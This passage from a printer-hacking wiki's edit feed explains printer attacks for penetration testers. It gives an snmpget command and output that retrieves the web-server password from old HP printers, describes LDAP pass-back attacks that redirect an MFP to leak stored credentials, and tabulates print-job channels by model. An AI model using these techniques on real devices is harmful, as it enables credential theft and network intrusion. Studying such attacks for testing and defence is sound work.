Ancient HP printers (manufactured 2003 and earlier) had a bug which allowed an attacker to retrieve the password for the embedded web server through SNMP requests. The vulnerable OID to be requested (''.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords'') was even documented by HP. Other vendors may have similar SNMP based issues. Penetration testers may find flaws by studying the various publicly available MIBs released by printer manufacturers.&lt;br /&gt;
&lt;br /&gt;
'''How to test this attack?'''&lt;br /&gt;
&lt;br /&gt;
To test this attack against ancient HP printers, the ''snmpget'' tool can be used as shown below:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=sh&amp;gt;&lt;br /&gt;
snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0&lt;br /&gt;
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 …&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Vulnerable devices will return the password in hexadecimal (here: ''AAA''), while newer devices only respond with zero bytes.&lt;br /&gt;
&lt;br /&gt;
'''Who can perform this attack?'''&lt;br /&gt;
&lt;br /&gt;
Anyone who can send network packets to port 161/udp of the printer device. &lt;br /&gt;
&lt;br /&gt;
=== Pass-Back ===&lt;br /&gt;
&lt;br /&gt;
Another interesting class of attacks is pass-back attacks, where ‘an MFP device is directed into authenticating [...] against a rogue system rather than the expected server’ &amp;lt;ref&amp;gt;''[http://foofus.net/goons/percx/praeda/pass-back-attack.pdf Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers]'', D. Heiland and M. Belton, 2011&amp;lt;/ref&amp;gt;. This works in setups where a printer/MFP authenticates users via an external [https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol LDAP] server. Note that the credentials to access the LDAP server are stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the stored credentials, then whenever someone (for example, the attacker) tries to authenticate with the MFP, the MFP leaks the original LDAP credentials to the attacker-controlled server. This example shows that passwords resident on a printer may cause harm beyond the device itself once it is integrated into a company's network. Printers and MFPs – which may offer insufficient protection – are therefore a good starting point in network penetration tests.&lt;br /&gt;
&lt;br /&gt;
'''How to test this attack?'''&lt;br /&gt;
&lt;br /&gt;
Check if you can change printer settings like the LDAP hostname while keeping the old LDAP password.&lt;br /&gt;
&lt;br /&gt;
'''Who can perform this attack?'''&lt;br /&gt;
&lt;br /&gt;
Usually anyone who can access the printer's embedded web server. This may include [https://en.wikipedia.org/wiki/Cross-site_request_forgery CSRF] attackers, if the web application running on the printer has no CSRF protection.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;/div&gt;</summary>
		<author><name>92.228.38.179</name></author>	</entry>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=Attack_carriers&amp;diff=567</id>
		<title>Attack carriers</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=Attack_carriers&amp;diff=567"/>
				<updated>2017-02-08T09:58:30Z</updated>
		
		<summary type="html">&lt;p&gt;92.228.38.179: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[File:Deployment-channels.png|thumb|Overview of channels to deploy a (malicious) print job]]&lt;br /&gt;
&lt;br /&gt;
Various channels like [[USB]], [[LPD]], [[IPP]], [[SMB]], or [[raw]] port 9100 printing can be used as carriers to deploy malicious print jobs. While it is possible to attack the [[Fundamentals#Network_printing_protocols|printing protocols]] themselves, most attacks discussed in this wiki target the [[PostScript]] and [[PJL]] interpreters. The payload is merely routed through one of the printing channels. This is important to note because it means '''whenever the attacker can somehow ‘print’ she can attack and exploit those interpreters'''.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:Printing-overview.png|400px|Attack the interpreters, not the printing channels]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This makes it much harder for the blue team ([[Countermeasures#Admins|network administrators]], for example) to defend against printer attacks. Many devices even allow printing (and therefore exploitation) by uploading a raw file to the printer's [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] service or to a form on the embedded web server. To give an impression, an overview of the printing channels supported by various printer models is given below.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align:center&amp;quot;&lt;br /&gt;
|+ Malicious print job deployment channels&lt;br /&gt;
|-&lt;br /&gt;
! Printer model             !! LPD !! IPP !! Raw !! Web !! FTP !! SMB !! USB&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | HP LaserJet 1200          ||  ✔  ||     ||  ✔  ||     ||     ||     ||&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | HP LaserJet 4200N         ||  ✔  ||  ✔  ||  ✔  ||     ||  ✔  ||     ||&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | HP LaserJet 4250N         ||  ✔  ||  ✔  ||  ✔  ||  ✔  ||  ✔  ||     || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | HP LaserJet P2015dn       ||  ✔  ||     ||  ✔  ||     ||     ||  ✔  || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | HP LaserJet M2727nfs      ||  ✔  ||     ||  ✔  ||     ||     ||  ✔  || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | HP LaserJet 3392 AiO      ||  ✔  ||     ||  ✔  ||     ||     ||  ✔  || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | HP Color LaserJet CP1515n ||  ✔  ||     ||  ✔  ||     ||     ||     || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | Brother MFC-9120CN        ||  ✔  ||  ✔  ||  ✔  ||     ||  ✔  ||     || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | Brother DCP-9045CDN       ||  ✔  ||  ✔  ||  ✔  ||     ||  ✔  ||     || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | Lexmark X264dn            ||  ✔  ||  ✔  ||  ✔  ||     ||  ✔  ||     || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | Lexmark E360dn            ||  ✔  ||  ✔  ||  ✔  ||     ||  ✔  ||     || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | Lexmark C736dn            ||  ✔  ||  ✔  ||  ✔  ||     ||  ✔  ||     || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | Dell 5130cdn              ||  ✔  ||  ✔  ||  ✔  ||     ||  ✔  ||  ✔  || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | Dell 1720n                ||  ✔  ||  ✔  ||  ✔  ||     ||  ✔  ||     || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | Dell 3110cn               ||  ✔  ||     ||  ✔  ||     ||  ✔  ||     || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | Kyocera FS-C5200DN        ||  ✔  ||     ||  ✔  ||     ||  ✔  ||  ✔  || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | Samsung CLX-3305W         ||  ✔  ||  ✔  ||  ✔  ||     ||     ||     || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | Samsung MultiPress 6345N  ||  ✔  ||  ✔  ||  ✔  ||  ✔  ||     ||     || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | Konica bizhub 20p         ||  ✔  ||  ✔  ||  ✔  ||     ||  ✔  ||     || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | OKI MC342dn               ||  ✔  ||  ✔  ||  ✔  ||  ✔  ||  ✔  ||  ✔  || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | Konica bizhub C454e       ||  ✔  ||  ✔  ||  ✔  ||  ✔  ||     ||  ✔  || ✔&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
It must be noted that these are not the only possible attack scenarios. For example using social engineering to make a victim print a malicious document is not even covered in this wiki yet – neither are new methods to deploy (potentially malicious) print jobs like [https://en.wikipedia.org/wiki/Cloud_printing cloud printing] or [https://webbluetoothcg.github.io/web-bluetooth/ Web Bluetooth].&lt;br /&gt;
&lt;br /&gt;
== Attacker Models ==&lt;br /&gt;
&lt;br /&gt;
A '''physical attacker''' has the capability to print documents from a USB stick or via USB/parallel cable. A (wired or wireless) attacker connecting through a '''TCP/IP network''' can deploy print jobs over LPD, IPP, port 9100/tcp, FTP, SMB and the embedded web server. Under the assumption that no strong user authentication like smart card based access control or SSL client certificates is enforced, both attacker models obviously have a channel to print, which is the precondition for further attacks to be carried out. Both are certainly quite strong attacker models because they require direct access – either physical or logical – to the device. However, in penetration testing scenarios where sneaking into the building is not an option and the printer is not directly reachable over the internet, other deployment channels are required. In such cases, the '''victim's web browser''' can be used as a carrier for printer malware, as discussed in [[cross-site printing]].&lt;br /&gt;
&lt;br /&gt;
→ ''Related articles:'' [[USB drive or cable]], [[Port 9100 printing]], [[Cross-site printing]]&lt;/div&gt;</summary>
		<author><name>92.228.38.179</name></author>	</entry>

	</feed>